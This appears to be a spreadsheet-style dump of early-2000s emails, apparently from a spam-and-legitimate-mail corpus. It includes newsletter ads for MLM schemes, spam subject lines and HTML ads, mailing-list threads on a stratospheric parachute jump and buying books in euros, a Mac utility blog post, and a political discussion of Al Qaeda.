 &lt;br&gt;&amp;nbsp;&amp;nbsp; ANSWERS:
 &lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; - What can I do about my computer freezing?
 &lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; A. Lloyd-Rees:
 Computer freezing and a program to free up memory
 &lt;p&gt;&gt;&gt; MEMBER SHOWCASES
 &lt;p&gt;&gt;&gt; MEMBER *REVIEWS*
 &lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; - Sites to Review: #142, #143&amp;nbsp; &amp;amp;
 #144!
 &lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; - Three new sites to review!
 &lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; - Site #141 Reviewed!
 &lt;p&gt;______________________________________________________
 &lt;p&gt;&gt;&gt;&gt;&gt;&gt;&gt; &lt;b&gt;QUESTIONS &amp;amp; ANSWERS&lt;/b&gt; &amp;lt;&amp;lt;&amp;lt;&amp;lt;&amp;lt;&amp;lt;
 &lt;br&gt;&lt;i&gt;Submit your questions &amp;amp; answers to &lt;a href="mailto:MyInput@AEOpublishing.com"&gt;MyInput@AEOpublishing.com&lt;/a&gt;&lt;/i&gt;
 &lt;p&gt;&lt;b&gt;QUESTIONS:&lt;/b&gt;
 &lt;p&gt;From:&amp;nbsp; Terry Mills&amp;nbsp;&amp;nbsp; - tlm@wwnet.net
 &lt;br&gt;Subject: Info on using Linux operation system?
 &lt;p&gt;In answer to the question in Exchange Issue #441,
 &lt;br&gt;WonderPaint gave a pretty darn good explanation of
 &lt;br&gt;what is going on in windows.&amp;nbsp; He suggests Linux.
 &lt;p&gt;My question is can the current software on my machine
 &lt;br&gt;use Linux if I were to switch to that OS and if not, how
 &lt;br&gt;much software is available for Linux.&amp;nbsp; Seems all I find is
 &lt;br&gt;for windows and some for the mac.&amp;nbsp; Thanks.
 &lt;p&gt;Terry
 &lt;br&gt;High quality LEADS for mlm.&amp;nbsp; Find three and get yours FREE.
 &lt;br&gt;Check the August Special!
 &lt;br&gt;&lt;a href="http://mysiteinc.com/tfn/leads.html"&gt;http://mysiteinc.com/tfn/leads.html&lt;/a&gt;
 &lt;br&gt;&amp;nbsp;
 &lt;p&gt;&lt;b&gt;ANSWERS:&lt;/b&gt;
 &lt;p&gt;From:&amp;nbsp; Anthony Lloyd-Rees&amp;nbsp;&amp;nbsp; - cutter@opalsinthebag.com
 &lt;br&gt;Subject:&amp;nbsp; Computer freezing and a program to free up memory
 &lt;p&gt;&gt;From:&amp;nbsp; NICETY7078@aol.com
 &lt;br&gt;&gt;Subject:&amp;nbsp; What can I do about my computer freezing? (Issue #439)
 &lt;br&gt;&gt;
 &lt;br&gt;&gt;My computer freezes when I use AOL and sometimes when
 &lt;br&gt;&gt;I'm just using the basic functions of Windows 98. My
 &lt;br&gt;&gt;defragmentor&amp;nbsp; keeps starting over and over and my scan
 &lt;br&gt;&gt;disk never finds anything wrong, but there has to be.
 &lt;p&gt;Hello Nicety,
 &lt;p&gt;I&amp;nbsp; have to agree with Jim Shofstall, http://www.wonderpaint.com,
 &lt;br&gt;when he wrote in Exchange Issue #441:
 &lt;p&gt;&amp;lt;snip&gt;
 &lt;br&gt;&amp;nbsp;One major problem is that many programs don't release memory
 &lt;br&gt;when you exit.&amp;nbsp; When working in Windoze I've always taken the
 &lt;br&gt;approach of rebooting on a regular basis before I've had problems,
 &lt;br&gt;&amp;lt;/snip&gt;
 &lt;p&gt;I believe AOL is a shell that sits on Windows, which pretty much
 &lt;br&gt;negates any hope for stability. *nix is the only non-Mac answer
 &lt;br&gt;for reliable computing. I am a Red Hat Linux user as everyone's
 &lt;br&gt;favourite Redmond OS obviously requires more smarts than I
 &lt;br&gt;have to make it do anything useful.
 &lt;p&gt;If you have to live with it however there is a cool little FREE
 &lt;br&gt;download called FreeMem which you can get here;
 &lt;br&gt;&lt;a href="http://www.meikel.com"&gt;http://www.meikel.com&lt;/a&gt;&lt;a href="http://www.meikel.com"&gt;&lt;/a&gt;
 &lt;p&gt;This utility frees up memory at a click when you exit an app, you
 &lt;br&gt;also get to see how your memory gets eaten up and not released.
 &lt;br&gt;This may not fix your problem but at least Windows will be
 &lt;br&gt;running at peak performance all the time and much easier than
 &lt;br&gt;constant rebooting. The more you use this OS the more of these
 &lt;br&gt;little third party fixer upper proggys and utilities you have to
 &lt;br&gt;search for.
 &lt;p&gt;HTH.&amp;nbsp; Tony.
 		&lt;p&gt;&lt;p&gt;______________________________________________________
 &lt;p&gt;&gt;&gt;&gt;&gt;&gt;&gt; &lt;b&gt;WEBSITE SHOWCASES&lt;/b&gt; &lt;&lt;&lt;&lt;&lt;&lt;
 &lt;p&gt;&lt;i&gt;Examine carefully - those with email addresses included WILL&lt;/i&gt;
 &lt;br&gt;&lt;i&gt;trade links with you, you are encouraged to contact them. And,&lt;/i&gt;
 &lt;br&gt;&lt;i&gt;there are many ways to build a successful business. Just look at&lt;/i&gt;
 &lt;br&gt;&lt;i&gt;these successful sites/programs other members are involved in..&lt;/i&gt;
 &lt;br&gt;-------------------------------------------------
 &lt;p&gt;RETIRE QUICKLY--Free Report "Seven Secrets to Earning
 &lt;br&gt;$100,000 from Home". Fully Automated Home Business.
 &lt;br&gt;81% commissions-Income UNLIMITED. Automated Sales,
 &lt;br&gt;Recruiting and Training MACHINE. Join NOW!
 &lt;br&gt;&lt;a href="http://orleantraders.4yoursuccess.org"&gt;http://orleantraders.4yoursuccess.org&lt;/a&gt;
 &lt;br&gt;Trade Links - &lt;a href="mailto:bgmlm@4yoursuccess.org"&gt;mailto:bgmlm@4yoursuccess.org&lt;/a&gt;
 &lt;br&gt;-------------------------------------------------
 &lt;p&gt;We Are Looking For A Handful Of "Qualified" People Who
 &lt;br&gt;Want To Make An Insane Income... Interested?&amp;nbsp; If you do
 &lt;br&gt;qualify, you will have access to the worlds most powerful
 &lt;br&gt;online marketing system that can easily explode your income.
 &lt;br&gt;&lt;a href="http://by.advertising.com/1/c/22555/27369/82101/82101"&gt;http://by.advertising.com/1/c/22555/27369/82101/82101&lt;/a&gt;
 &lt;br&gt;-------------------------------------------------
 &lt;p&gt;CIGARETTES GO $MLM$ FREESamples AND Customer Membership
 &lt;br&gt;$5 OFF 1st Order, 600+ Varieties from $9.95 per carton!
 &lt;br&gt;BusOP Seekers - Cigarettes are the ultimate consumable!
 &lt;br&gt;High customer retention insures a steady residual income
 &lt;br&gt;&lt;a href="http://www.key-list.com/track.cgi/mark2020/web6.html"&gt;http://www.key-list.com/track.cgi/mark2020/web6.html&lt;/a&gt;
 &lt;br&gt;Trade Links - &lt;a href="mailto:tradlinks@brand-name-cigarettes.com"&gt;tradlinks@brand-name-cigarettes.com&lt;/a&gt;
 &lt;br&gt;-------------------------------------------------
 &lt;p&gt;&lt;i&gt;If you have a product, service, opportunity and/or quality&lt;/i&gt;
 &lt;br&gt;&lt;i&gt;merchandise that appeals to people worldwide, reach your&lt;/i&gt;
 &lt;br&gt;&lt;i&gt;target audience!&lt;/i&gt;
 &lt;p&gt;&lt;i&gt;For a fraction of what other large newsletters charge you&lt;/i&gt;
 &lt;br&gt;&lt;i&gt;can exhibit your website here for only $8 CPM. Why?...&lt;/i&gt;
 &lt;br&gt;&lt;i&gt;Because as a valuable member we want you to be successful!&lt;/i&gt;
 &lt;br&gt;&lt;i&gt;Order today - Exhibits are limited and published on a&lt;/i&gt;
 &lt;br&gt;&lt;i&gt;first come, first serve basis. &lt;a href="http://bannersgomlm.com/ezine"&gt;http://bannersgomlm.com/ezine&lt;/a&gt;&lt;/i&gt;
 &lt;br&gt;
 		&lt;p&gt;&lt;br&gt;______________________________________________________
 &lt;p&gt;&gt;&gt;&gt;&gt;&gt;&gt; &lt;b&gt;MEMBER *REVIEWS*&lt;/b&gt; &amp;lt;&amp;lt;&amp;lt;&amp;lt;&amp;lt;&amp;lt;
 &lt;p&gt;Visit these sites, look for what you like and any suggestions
 &lt;br&gt;you can offer, and send your critique to MyInput
 &lt;br&gt;And, after reviewing three sites, your web site will be added to
 &lt;br&gt;the list! It's fun, easy, and it's a great opportunity to give
 &lt;br&gt;some help and receive an informative review of your own site.
 &lt;br&gt;Plus, you can also win a chance to have y our site chosen for
 &lt;br&gt;a free website redesign. One randomly drawn winner each month!
 &lt;br&gt;&amp;nbsp;
 &lt;p&gt;&lt;b&gt;SITES TO REVIEW:&lt;/b&gt;
 &lt;p&gt;Site #142:&amp;nbsp; &lt;a href="http://www.sharesmiles.com"&gt;http://www.sharesmiles.com&lt;/a&gt;
 &lt;br&gt;James Garrison
 &lt;br&gt;webmaster@sharesmiles.com
 &lt;p&gt;Site #143:&amp;nbsp; &lt;a href="http://www.selltheworldonline.com/default2.asp?ref=1282"&gt;http://www.selltheworldonline.com/default2.asp?ref=1282&lt;/a&gt;
 &lt;br&gt;gofreet@yahoo.com.au
 &lt;p&gt;Site #144:&amp;nbsp; &lt;a href="http://www.tpcenterprises.com/"&gt;http://www.tpcenterprises.com/&lt;/a&gt;
 &lt;br&gt;info@tpcenterprises.com
 &lt;p&gt;Site #145:&amp;nbsp;&amp;nbsp; &lt;a href="http://www.worldwidewebproductions.com"&gt;http://www.worldwidewebproductions.com&lt;/a&gt;
 &lt;br&gt;Len Seider
 &lt;br&gt;wORLDwIDEwEBPros@cs.com
 &lt;p&gt;Site #146:&amp;nbsp; &lt;a href="http://www.candlecreations.com"&gt;http://www.candlecreations.com&lt;/a&gt;
 &lt;br&gt;Melissa Kalmbach
 &lt;br&gt;melscandles@msn.com
 &lt;p&gt;Site #147:&amp;nbsp; &lt;a href="http://www.passionforperfume.com"&gt;http://www.passionforperfume.com&lt;/a&gt;
 &lt;br&gt;Janice Holton
 &lt;br&gt;janice@passionforperfume.com
 &lt;br&gt;~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 &lt;br&gt;&amp;nbsp;
 &lt;p&gt;&lt;b&gt;SITE&amp;nbsp; REVIEWED!&lt;/b&gt;
 &lt;p&gt;Comments on Site #141:&amp;nbsp; &lt;a href="http://www.floridarental.co.uk"&gt;http://www.floridarental.co.uk&lt;/a&gt;
 &lt;br&gt;Carol Hall
 &lt;br&gt;carol@floridarental.co.uk
 &lt;br&gt;~~~~
 &lt;p&gt;Just finished looking over your site. It's very flashy and maybe
 &lt;br&gt;just a tad overdone. I had difficulty finding my way around
 &lt;br&gt;your site and couldn't understand its purpose until I had gone
 &lt;br&gt;three pages into it. Maybe it would be a little more useful to
 &lt;br&gt;make your front page navigation a little less confusing?
 &lt;p&gt;The "next page" tab is right next to one that says "bookmark
 &lt;br&gt;this page" - no information until you mouseover the tab to
 &lt;br&gt;tell you you are entering the site. I felt a little overwhelmed
 &lt;br&gt;with glitz - animated gif's overemphasized words etc and not
 &lt;br&gt;enough information on your openning page.
 &lt;br&gt;~~~~
 &lt;p&gt;I also surprised to see a site for Florida rentals with a URL
 &lt;br&gt;ending with .uk.&amp;nbsp; Recommendations for this site.
 &lt;br&gt;1. On the home page a person's eyes are drawn first to the
 &lt;br&gt;animation and red text on the yellow background, missing
 &lt;br&gt;the first sentence. Remove the animation and add more
 &lt;br&gt;details to this important introduction. Instead of using the
 &lt;br&gt;'click here' button, just have a text link following directly
 &lt;br&gt;after the introduction.
 &lt;br&gt;2. On the second page, have all your links the same color,
 &lt;br&gt;and all your text a different color. Don't confuse people on
 &lt;br&gt;what is a link and what they need to read. Underlined text
 &lt;br&gt;on the internet can often be confused for a link, expecially
 &lt;br&gt;when it is in the normal blue link color.&amp;nbsp; Having the
 &lt;br&gt;important links in red and with the flashing arrow is overkill.
 &lt;br&gt;3. On the rest of the site, you have good information, but
 &lt;br&gt;you don't need the top menu bar when using the framed
 &lt;br&gt;menu and the pages are all untitled.
 &lt;p&gt;I hope you don't think I'm being too harsh, I just know you
 &lt;br&gt;want the best site you can have and I think these changes
 &lt;br&gt;will make a world of difference.&amp;nbsp; Once a person gets into the
 &lt;br&gt;site you have the information organized and complete. I
 &lt;br&gt;even wanted to come and stay!
 &lt;br&gt;~~~~
 &lt;p&gt;The animations make this site look amateurish from the
 &lt;br&gt;beginning.&amp;nbsp; The flashing "Bookmark This Site" makes me
 &lt;br&gt;want to leave instead of come back!&amp;nbsp; The font Comic Sans
 &lt;br&gt;MS also looks very kiddy.&amp;nbsp; Much could be done to improve
 &lt;br&gt;this site.
 &lt;br&gt;~~~~
 &lt;p&gt;I was confused by this site. There are four animated gifs on the
 &lt;br&gt;first screen, and so my eyes kept flicking back and forth between
 &lt;br&gt;them. I read over the paragraph of information, but didn't know
 &lt;br&gt;where to click. I finally figured out the 'click here' button should
 &lt;br&gt;have been up by the text and that is where I should go.
 &lt;p&gt;On the 2nd page, again too many flashing gifs.&amp;nbsp; Other than that,
 &lt;br&gt;the 2nd page was much easier to find my way around. One
 &lt;br&gt;suggestion, if you're using frames it is unneccessary to have
 &lt;br&gt;the menu of links listed both on one frame and at the top of
 &lt;br&gt;the page as was shown on the 'special offers' page.
 &lt;p&gt;The font style and bright colors made the site look casual and
 &lt;br&gt;laid back, like a trip to Florida should be, so that was good.
 &lt;br&gt;Besides the flashing gifs, by the time I left I liked this site, but
 &lt;br&gt;if I hadn't been reviewing it I don't know if I would have gotten
 &lt;br&gt;that far.
 &lt;br&gt;~~~~
 &lt;p&gt;This site is bright and breezy. It is very clean, easy to read
 &lt;br&gt;and navigate. Logically presented and information-rich.
 &lt;br&gt;Some pages had too many animated images for my own taste,
 &lt;br&gt;but the pages are happy and cheery. Tip: If you can get a hold
 &lt;br&gt;of PaintShop Pro, you can take out the white squares that
 &lt;br&gt;form a background for some images.
 &lt;br&gt;~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 &lt;br&gt;______________________________________________________
 		&lt;p&gt;&lt;br&gt;moderator: Amy Mossel&amp;nbsp; &lt;a href="mailto:Moderator@AEOpublishing.com"&gt;Moderator&lt;/a&gt;
 &lt;br&gt;posting:&amp;nbsp;&amp;nbsp; &lt;a href="mailto:MyInput@AEOpublishing.com"&gt;MyInput@AEOpublishing.com&lt;/a&gt;
 &lt;br&gt;______________________________________________________
 &lt;p&gt;Send posts and questions (or your answers) to:
 &lt;br&gt;&amp;nbsp;&amp;nbsp; &lt;a href="mailto:MyInput@AEOpublishing.com"&gt;MyInput@AEOpublishing.com&lt;/a&gt;
 &lt;br&gt;Please send suggestions and comments to:
 &lt;br&gt;&amp;nbsp;&amp;nbsp; &lt;a href="mailto:Moderator@AEOpublishing.com"&gt;Moderator@AEOpublishing.com&lt;/a&gt;
 &lt;p&gt;To change your subscribed address, send both new
 &lt;br&gt;and old address to &lt;a href="mailto:Moderator@AEOpublishing.com"&gt;Moderator@AEOpublishing.com&lt;/a&gt;
 &lt;br&gt;See below for unsubscribe instructions.
 &lt;p&gt;Copyright 2001 AEOpublishing
 &lt;p&gt;----- End of Your Membership Exchange
 		&lt;!-- End Letter Body --&gt;
 		&lt;!-- Begin Signature  --&gt;
 		&lt;p&gt;
 		&lt;p&gt;
 		&lt;br&gt;
 		&lt;hr width="60%" size="1" align="left" NOSHADE&gt;
 		&lt;br&gt;
 		&lt;!-- End Signature  --&gt;
 		&lt;/font&gt;
 		&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;/table&gt;
 	&lt;!-- End Content Table --&gt;
 	&lt;/td&gt;
 	&lt;td width="25" bgcolor="#870000"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;!-- Begin Phone Number Row --&gt;
 &lt;tr&gt;
 	&lt;td width="25" bgcolor="#870000"&gt;&lt;/td&gt;
 	&lt;td width="525" bgcolor="#870000" align="right"&gt;&lt;font face="Verdana,Geneva,Arial,Helvetica,sans-serif" size="1" color="#FFFFFF"&gt; &lt;/font&gt;&lt;/td&gt;
 	&lt;td width="25"&gt;&lt;img src="http://ccprod.roving.com/roving/images/letters/red-corner-br.gif" width="25" height="25" border="0" alt=""&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;!-- End Phone Number Row --&gt;
 &lt;tr&gt;
 	&lt;td colspan="3" bgcolor="#FFFFFF" align="center"&gt;
 	&lt;!--  You are required by your Constant Contact user agreement to
       provide the opt-out link shown below as by the property 'OptOut' --&gt;
 	&lt;font face="Verdana,Arial,Helvetica,sans-serif" size="1"&gt;
 	&lt;br&gt;This email was sent to jm@netnoteinc.com, at your request, by &lt;a href="http://ccprod.roving.com/roving/sa/s.jsp?id=bd7n7877.jbozuta6"&gt;Your Membership Newsletter Services&lt;/a&gt;.  
 	&lt;br&gt;Visit our Subscription Center to &lt;a href="http://ccprod.roving.com/roving/d.jsp?p=oo&amp;id=bd7n7877.jbozuta6&amp;m=bd7n7877&amp;ea=jm@netnoteinc.com"&gt;edit&lt;/a&gt; your interests or &lt;a href="http://ccprod.roving.com/roving/d.jsp?p=oo&amp;id=bd7n7877.jbozuta6&amp;m=bd7n7877&amp;ea=jm@netnoteinc.com"&gt;unsubscribe&lt;/a&gt;.
 	&lt;br&gt;View our &lt;a href="http://ccprod.roving.com/roving/CCPrivacyPolicy.jsp"&gt;privacy policy&lt;/a&gt;.
 	&lt;p&gt;Powered by
 	&lt;br&gt;&lt;a href="http://www.constantcontact.com/index.jsp?cc=ctrlr" target="_blank"&gt;&lt;img src="http://ccprod.roving.com/roving/images/cc-logo-color-sm.gif" border="0" alt="Constant Contact"&gt;&lt;/a&gt;
 	&lt;/font&gt;
 	&lt;!-- end opt-out area --&gt;
 	&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/center&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 --1695567064.997091752024.JavaMail.RovAdmin.rovweb003--
</t>
  </si>
  <si>
    <t xml:space="preserve">John Hall wrote:
 &gt;Why so fast?  Normal terminal velocity is much slower.
 &gt;  
 &gt;
 Not at 40,000 m. I found this article 
 (http://www.wired.com/news/print/0,1294,53928,00.html) :
 "The last person to try to break the highest free fall record died in 
 the attempt. In 1965, New Jersey truck driver Nick Piantanida suffered 
 catastrophic equipment failure when his facemask blew out at 57,000 
 feet. Lack of oxygen caused such severe brain damage that he went into a 
 coma and died four months later."
 And in amongst the flash at
 http://www.legrandsaut.org/site_en/
 you can discover that he will break the sound barrier at 35,000 m,
 presumably reaching top speed somewhere above 30,000.
 Owen
 &gt;  
 &gt;
 &gt;&gt;-----Original Message-----
 &gt;&gt;From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
 &gt;&gt;bitbitch@magnesium.net
 &gt;&gt;Sent: Sunday, September 08, 2002 8:36 AM
 &gt;&gt;To: (Robert Harley)
 &gt;&gt;Cc: fork@example.com
 &gt;&gt;Subject: Re: The Big Jump
 &gt;&gt;
 &gt;&gt;
 &gt;&gt;
 &gt;&gt;So uh, would this qualify for the Darwin awards if he doesn't make it?
 &gt;&gt;
 &gt;&gt;Freaking french people...
 &gt;&gt;   :-)
 &gt;&gt;-BB
 &gt;&gt;RH&gt; Today a French officer called Michel Fournier is supposed to get
 &gt;&gt;    
 &gt;&gt;
 &gt;in a
 &gt;  
 &gt;
 &gt;&gt;RH&gt; 350-metre tall helium balloon, ride it up to the edge of space (40
 &gt;&gt;    
 &gt;&gt;
 &gt;km
 &gt;  
 &gt;
 &gt;&gt;RH&gt; altitude) and jump out.  His fall should last 6.5 minutes and
 &gt;&gt;    
 &gt;&gt;
 &gt;reach
 &gt;  
 &gt;
 &gt;&gt;RH&gt; speeds of Mach 1.5.  He hopes to open his parachute manually at
 &gt;&gt;    
 &gt;&gt;
 &gt;the
 &gt;  
 &gt;
 &gt;&gt;RH&gt; end, although with an automatic backup if he is 7 seconds from the
 &gt;&gt;RH&gt; ground and still hasn't opened it.
 &gt;&gt;
 &gt;&gt;RH&gt; R
 &gt;&gt;
 &gt;&gt;RH&gt; ObQuote:
 &gt;&gt;RH&gt;   "Veder, si aver si grossi li coglioni, come ha il re di
 &gt;&gt;    
 &gt;&gt;
 &gt;Franza."
 &gt;  
 &gt;
 &gt;&gt;RH&gt;   ("Let's see if I've got as much balls as the King of France!")
 &gt;&gt;RH&gt;   - Pope Julius II, 2 January 1511
 &gt;&gt;
 &gt;&gt;
 &gt;&gt;
 &gt;&gt;--
 &gt;&gt;Best regards,
 &gt;&gt; bitbitch                            mailto:bitbitch@magnesium.net
 &gt;&gt;    
 &gt;&gt;
 &gt;
 &gt;
 &gt;  
 &gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: 3.9 Cents With No Monthly Fees - Best Long Distance On the Net
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;mailv06c.gif&lt;/title&gt;
 &lt;meta http-equiv="Content-Type" content="text/html;"&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#ffffff"&gt;
 &lt;table align="center" border="0" cellpadding="0" cellspacing="0"
 width="625"&gt;
   &lt;tr&gt;
    &lt;td&gt;&lt;img src="http://theadmanager.com/ads/bottomline/imgs/spacer.gif"
 width="327" height="1" border="0"&gt;&lt;/td&gt;
    &lt;td&gt;&lt;img src="http://theadmanager.com/ads/bottomline/imgs/spacer.gif"
 width="40" height="1" border="0"&gt;&lt;/td&gt;
    &lt;td&gt;&lt;img src="http://theadmanager.com/ads/bottomline/imgs/spacer.gif"
 width="219" height="1" border="0"&gt;&lt;/td&gt;
    &lt;td&gt;&lt;img src="http://theadmanager.com/ads/bottomline/imgs/spacer.gif"
 width="39" height="1" border="0"&gt;&lt;/td&gt;
    &lt;td&gt;&lt;img src="http://theadmanager.com/ads/bottomline/imgs/spacer.gif"
 width="1" height="1" border="0"&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
    &lt;td&gt;&lt;img
 src="http://theadmanager.com/ads/bottomline/imgs/mailv06c_01.gif"
 width="327" height="50" border="0"&gt;&lt;/td&gt;
    &lt;td&gt;&lt;img
 src="http://theadmanager.com/ads/bottomline/imgs/mailv06c_02.gif"
 width="40" height="50" border="0"&gt;&lt;/td&gt;
    &lt;td&gt;&lt;img
 src="http://theadmanager.com/ads/bottomline/imgs/mailv06c_03.gif"
 width="219" height="50" border="0"&gt;&lt;/td&gt;
    &lt;td&gt;&lt;img
 src="http://theadmanager.com/ads/bottomline/imgs/mailv06c_04.gif"
 width="39" height="50" border="0"&gt;&lt;/td&gt;
    &lt;td&gt;&lt;img src="http://theadmanager.com/ads/bottomline/imgs/spacer.gif"
 width="1" height="50" border="0"&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
    &lt;td&gt;&lt;img
 src="http://theadmanager.com/ads/bottomline/imgs/mailv06c_05.gif"
 width="327" height="208" border="0"&gt;&lt;/td&gt;
    &lt;td&gt;&lt;img
 src="http://theadmanager.com/ads/bottomline/imgs/mailv06c_06.gif"
 width="40" height="208" border="0"&gt;&lt;/td&gt;
    &lt;td&gt;&lt;img
 src="http://theadmanager.com/ads/bottomline/imgs/mailv06c_07.jpg"
 width="219" height="208" border="0"&gt;&lt;/td&gt;
    &lt;td&gt;&lt;img
 src="http://theadmanager.com/ads/bottomline/imgs/mailv06c_08.gif"
 width="39" height="208" border="0"&gt;&lt;/td&gt;
    &lt;td&gt;&lt;img src="http://theadmanager.com/ads/bottomline/imgs/spacer.gif"
 width="1" height="208" border="0"&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
    &lt;td&gt;&lt;img
 src="http://theadmanager.com/ads/bottomline/imgs/mailv06c_09.gif"
 width="327" height="37" border="0"&gt;&lt;/td&gt;
    &lt;td&gt;&lt;img
 src="http://theadmanager.com/ads/bottomline/imgs/mailv06c_10.gif"
 width="40" height="37" border="0"&gt;&lt;/td&gt;
    &lt;td&gt;&lt;img
 src="http://theadmanager.com/ads/bottomline/imgs/mailv06c_11.gif"
 width="219" height="37" border="0"&gt;&lt;/td&gt;
    &lt;td&gt;&lt;img
 src="http://theadmanager.com/ads/bottomline/imgs/mailv06c_12.gif"
 width="39" height="37" border="0"&gt;&lt;/td&gt;
    &lt;td&gt;&lt;img src="http://theadmanager.com/ads/bottomline/imgs/spacer.gif"
 width="1" height="37" border="0"&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
    &lt;td&gt;&lt;img
 src="http://theadmanager.com/ads/bottomline/imgs/mailv06c_13.gif"
 width="327" height="179" border="0"&gt;&lt;/td&gt;
    &lt;td colspan="2"&gt;&lt;img
 src="http://theadmanager.com/ads/bottomline/imgs/mailv06c_14.gif"
 width="259" height="179" border="0"&gt;&lt;/td&gt;
    &lt;td&gt;&lt;img
 src="http://theadmanager.com/ads/bottomline/imgs/mailv06c_15.gif"
 width="39" height="179" border="0"&gt;&lt;/td&gt;
    &lt;td&gt;&lt;img src="http://theadmanager.com/ads/bottomline/imgs/spacer.gif"
 width="1" height="179" border="0"&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
    &lt;td&gt;&lt;img
 src="http://theadmanager.com/ads/bottomline/imgs/mailv06c_16.gif"
 width="327" height="126" border="0"&gt;&lt;/td&gt;
    &lt;td colspan="2"&gt;&lt;a
 href="http://theadmanager.com/server/c.asp?ad_key=JWCOEYCBFRDF"&gt;&lt;img
 src="http://theadmanager.com/ads/bottomline/imgs/mailv06c_17.gif"
 width="259" height="126" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
    &lt;td&gt;&lt;img
 src="http://theadmanager.com/ads/bottomline/imgs/mailv06c_18.gif"
 width="39" height="126" border="0"&gt;&lt;/td&gt;
    &lt;td&gt;&lt;img src="http://theadmanager.com/ads/bottomline/imgs/spacer.gif"
 width="1" height="126" border="0"&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;img src="http://admanmail.com/server/t.asp?ad_key=JWCOEYCBFRDF"
 width="1" height="1" hspace="0" vspace="0" border="0" alt="T"&gt;
 &lt;hr size="1" noshade&gt;
 &lt;font face="Arial" size="1" color="#000000"&gt;
 Your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ad.&lt;BR&gt;&lt;/FONT&gt; &lt;/body&gt; &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: New Improved Fat Burners, Now With TV Fat Absorbers! Time:7:20:54 AM
</t>
  </si>
  <si>
    <t xml:space="preserve">Caolan McNamara wrote:
 &gt; On Tue, Aug 06, 2002 at 04:21:22 +0100, David O'Callaghan wrote:
 &gt; &gt; 
 &gt; &gt; Hello,
 &gt; &gt; 
 &gt; &gt; What are your recommendations for buying books (technical and
 &gt; &gt; otherwise) online, from Irish or European sellers. Is there 
 &gt; &gt; anywhere that has as good a selection as, say, Amazon but
 &gt; &gt; deals in Euro?
 &gt; 
 &gt; amazon.de and amazon.fr ? :-)
 Having recently checked out both of these, for a selection of
 books, the exact same basket of books cost more in both .de and
 .fr (taking delivery charges, VAT et al into account) than buying
 the same thing in amazon.co.uk
 The books I used to check were 
 1) C unleashed (Heathfield et al)
 2) Design Patterns (Gamma et al)
 3) Computer Graphics, principles and practice (Foley et al)
 I was hugely surprised that amazon.co.uk worked out cheapest - by
 a considerable margin, too - something like 12 euros after
 freight was taken into account.
 Cheers,
 Dave.
 -- 
        David Neary,
     Marseille, France
   E-Mail: bolsh@gimp.org
 -- 
 Irish Linux Users' Group Social Events: social@linux.ie
 http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: DVD stills
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/09/24.html#dvd_stills
 Date: 2002-09-24T13:49:41-05:00
 DVD Capture 1.0[1] &amp;#8220;is a helper application for the Apple DVD Player. It 
 enables the user to take screen captures of the DVD Player Viewer in window and 
 full screen mode. The captures can be saved to a file or placed on the 
 clipboard.&amp;#8221;
 [1] http://www.versiontracker.com/dyn/moreinfo/macosx/16324
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: =?us-ascii?Q?FW:_Re:_Al_Qaeda's_Fantasy_Ideology?=
</t>
  </si>
  <si>
    <t xml:space="preserve">-----Original Message-----
 From: Damien Morton [mailto:damien.morton@acm.org] 
 Sent: Saturday, 17 August 2002 02:55
 To: 'polrev@hoover.stanford.edu'
 Subject: Re: Al Qaeda's Fantasy Ideology
 Youre right of course - the attack was performed for its effect on
 muslims, not for its effect on the US. By showing that it can be done,
 they inspire others to follow in their path, or so they hope.
 I take some objection to the belabouring of the term fantasy, because it
 is somewhat perjorative. Imagining different worlds can often lead the
 world to become more like that imagined. Moreso if action is taken on
 the basis of those imaginings.
 Theres an interesting parralel with the great capitalist dream that
 anyone can make anything happen through hard work and a bit of luck.
 This is equally a fantasy, but one made to approach reality through
 consensus.
 An interesting question then becomes, if Al Queda's actions are in
 furtherance of a fantasy, what fantasies are George Bush's actions in
 furtherace of? How many of the actions of George Bush and the US are
 performed for their effect on the US population? For example, how much
 showmanship has been put into rebuilding the morale of wall street. Is
 this not as much a spirtual investment as the sacrifices Al Queda made?
 What cultural myopia is in play here in the US?
 I make a point of reading Australian, Britsish and US news. Today I
 noticed that the Australian and British news are featuring the Iraqi
 overtures to the UN on inspectors, while US news is featuring Iraqi war
 preparations (digging bunkers etc).
 At a time that the US is withdrawing from international cooperation on
 multiple levels, the fantasy of being surrounded by enemies (invisible
 preferably) is somewhat appealing. A self fullfilling prophesy, if you
 like. Perhaps that's whats at work here.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Unleash your PC's Multimedia POWER at 70% off retail!
</t>
  </si>
  <si>
